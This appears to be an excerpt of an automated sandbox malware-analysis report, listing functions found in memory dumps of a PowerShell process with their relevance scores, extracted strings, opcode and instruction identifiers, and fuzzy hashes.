                                                                    • String ID: 4']q$84ul$d%cq$d%cq$d%cq$tP]q
                                                                    • API String ID: 0-2581610394
                                                                    • Opcode ID: af3446093917bb028478649dd315fdb98ea979b0206275156ae17b7d25da89ea
                                                                    • Instruction ID: 328e933e3eda66ef76a0810531ee99393bfea15301b64839012259f9d4e2d279
                                                                    • Opcode Fuzzy Hash: af3446093917bb028478649dd315fdb98ea979b0206275156ae17b7d25da89ea
                                                                    • Instruction Fuzzy Hash: A3316AB0A00215AFCB24DF58C580A6AFBB2AF88B20F658569E845AB350C631DD41CBA0
                                                                    Function 07D9EA08 Relevance: 6.4, Strings: 5, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-2353078639
                                                                    • Opcode ID: 55aebd20a9eebbe5b54339ab1c6731eaeeb52754cdfc610e953754a41f443ef5
                                                                    • Instruction ID: bfe1e9b54014493e1b93fa25072b750bedf1f810e2ef3b4505c06f5d3544ce96
                                                                    • Opcode Fuzzy Hash: 55aebd20a9eebbe5b54339ab1c6731eaeeb52754cdfc610e953754a41f443ef5
                                                                    • Instruction Fuzzy Hash: 6E51F4B270420ACFCF25CF28C5446AAFBA2FF81314F14C976E8568B261D734D951CB51
                                                                    Function 07D90538 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-2353078639
                                                                    • Opcode ID: 0ed2da9f9dad71b916432e15a59e9b28c371415a7dbfa3d9ade55ade13bcd303
                                                                    • Instruction ID: a12a161893f75db21a8cc71b40e3563b2c5a32895b9d9860cce50bc26a8d2fff
                                                                    • Opcode Fuzzy Hash: 0ed2da9f9dad71b916432e15a59e9b28c371415a7dbfa3d9ade55ade13bcd303
                                                                    • Instruction Fuzzy Hash: F14107B1714207DFCF255E34A4106BABFB5AFC1710F14447AD951CB292DB35C945C7A2
                                                                    Function 07D92608 Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-2353078639
                                                                    • Opcode ID: b1739c6e2146750285e99adb19badd87c60cc282dd06565d793de217cbeb0c2e
                                                                    • Instruction ID: 3734368c01939af58d8ad7fc33398a8a9b90e9479186da037a75b4bc2c91c7a5
                                                                    • Opcode Fuzzy Hash: b1739c6e2146750285e99adb19badd87c60cc282dd06565d793de217cbeb0c2e
                                                                    • Instruction Fuzzy Hash: B34138B1300206EBCF294E288580166F7E5BF82320F2884BBC8D18B551DA35E915C712
                                                                    Function 07D9B018 Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2702571027
                                                                    • Opcode ID: 38f7fafccf103587f8cc3f4825c34e250813fa264c6477c350e1d492e033c564
                                                                    • Instruction ID: 6f2137eb96ae2e463d5f23ea2214a57ca6bbd14ee03584f5d38c3278f0bfe894
                                                                    • Opcode Fuzzy Hash: 38f7fafccf103587f8cc3f4825c34e250813fa264c6477c350e1d492e033c564
                                                                    • Instruction Fuzzy Hash: AD41E8F0A00206DBDF248E44E544BA9F7E2EF46710F16C177E8696B290C771D941CBA1
                                                                    Function 09671AB4 Relevance: 6.3, Strings: 5, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2319313964.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_9670000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tP]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-444294576
                                                                    • Opcode ID: d8cf17e1666391f0c727280928041b3b1ec4b768df51f355dd770ec5c094a471
                                                                    • Instruction ID: 46e9cd01ed1acc1d0f82b7ac4e10afbb319d756bdb72d340e37afbc56e46c8fa
                                                                    • Opcode Fuzzy Hash: d8cf17e1666391f0c727280928041b3b1ec4b768df51f355dd770ec5c094a471
                                                                    • Instruction Fuzzy Hash: DE210036708305CFDB248FA8C980A6AF7F5EF86F50B26406BE8009B321E731D901C7A1
                                                                    Function 07D92ED0 Relevance: 5.3, Strings: 4, Instructions: 274COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84ul$84ul$tP]q$tP]q
                                                                    • API String ID: 0-2208220189
                                                                    • Opcode ID: 8e56e3523034ecd896928be0ed7421e6a7ed6b6f91332c94d47cb648ff92201b
                                                                    • Instruction ID: 66268d190617f64408ef9e051c63ca438e0dcc95abf5efa329dfa7d2542fcf12
                                                                    • Opcode Fuzzy Hash: 8e56e3523034ecd896928be0ed7421e6a7ed6b6f91332c94d47cb648ff92201b
                                                                    • Instruction Fuzzy Hash: A99149B1700206DFCF189E7DC891A7AFBE6AF85710F18887AD889DB291DA35DC41C761
                                                                    Function 07D93C10 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (fwl$(fwl$(fwl$(fwl
                                                                    • API String ID: 0-2555649572
                                                                    • Opcode ID: d3e9a45781708c9580bb5fa7f110a930b8f49bfbdc8723ef988859080c6f0ef2
                                                                    • Instruction ID: 551ec8d78e6764d014b0a732bd3acb66338baf7421ecbf408c0e308d32437b43
                                                                    • Opcode Fuzzy Hash: d3e9a45781708c9580bb5fa7f110a930b8f49bfbdc8723ef988859080c6f0ef2
                                                                    • Instruction Fuzzy Hash: 25718DB4A00209DFCF28CF58C554A6AFBB2EF88314F188579D805AB355CB32ED41CBA1
                                                                    Function 07D97E28 Relevance: 5.1, Strings: 4, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,Swl$,Swl$p5gk$xSwl
                                                                    • API String ID: 0-1686951114
                                                                    • Opcode ID: 450ad195e8d8d545953772d4e545372ad301297eecc861f17a4d2cec6c501f97
                                                                    • Instruction ID: 726d49ff4a7896a61412f3092b9cb57a012f0478030c60f536d526c09b5348c3
                                                                    • Opcode Fuzzy Hash: 450ad195e8d8d545953772d4e545372ad301297eecc861f17a4d2cec6c501f97
                                                                    • Instruction Fuzzy Hash: E3312BB1B1434A8FCF219B7894102ABFBB5AFC6220F1484BBD445DB651EA31CC45CBA2
                                                                    Function 07D9A1B8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: 389058ecff6c46d01212fc1faf8be3a9d33b8db10377d03079f594c31ff07818
                                                                    • Instruction ID: 59eb110abfd3e8480b3d1a01360cdede21f5ed7597addf8ffbe63200de2b7f3a
                                                                    • Opcode Fuzzy Hash: 389058ecff6c46d01212fc1faf8be3a9d33b8db10377d03079f594c31ff07818
                                                                    • Instruction Fuzzy Hash: 4E2137B33003169BDF38557E5840B67FBDA9BC1710F24D43AA845EB282DD3AC840C361
                                                                    Function 07D98260 Relevance: 5.1, Strings: 4, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,Swl$4']q$d5gk$xSwl
                                                                    • API String ID: 0-761416106
                                                                    • Opcode ID: 131fc4b15d88aa3727e2027af2078dfb2482675a57cde0899bcd3be3f18759ab
                                                                    • Instruction ID: fb40bf599339f94eb69975443b93cc6bf100c85d50abb27edb3eae5cb0f97da5
                                                                    • Opcode Fuzzy Hash: 131fc4b15d88aa3727e2027af2078dfb2482675a57cde0899bcd3be3f18759ab
                                                                    • Instruction Fuzzy Hash: 8B31BFF1B00607DBDF249E68C940A6AF7A2AF86E14F148179D905CB261D731D881EBE6
                                                                    Function 07D9B408 Relevance: 5.1, Strings: 4, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: d9b9aa20036e18255cce1ce10ed76bdebd0d796a6ab44e4f815dfc965076f640
                                                                    • Instruction ID: 1bd403adb409283d27ade6afc5fe18b196930ec96f9ca6d1feb9b1723eeb9629
                                                                    • Opcode Fuzzy Hash: d9b9aa20036e18255cce1ce10ed76bdebd0d796a6ab44e4f815dfc965076f640
                                                                    • Instruction Fuzzy Hash: A221AEF5A00306EBDF348E59A541676F7F5EB81614F1A447BD88487201D631D944DBA2
                                                                    Function 07D90308 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2311883835.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7d90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q
                                                                    • API String ID: 0-978391646
                                                                    • Opcode ID: 848e36f2e7953eb86d22f6e3ea77abca771e31dfe8ad9e99ef1d0904a9363a4e
                                                                    • Instruction ID: 577a0b760d874256278db894f3bcb9af050c5fe14698352bcba0198bc8ce2b3c
                                                                    • Opcode Fuzzy Hash: 848e36f2e7953eb86d22f6e3ea77abca771e31dfe8ad9e99ef1d0904a9363a4e
                                                                    • Instruction Fuzzy Hash: 4B017C6131D3C64FCB3B167C2960196AFB6AF87A1072A45E7C4D1CF2A7C9184D4AC3A7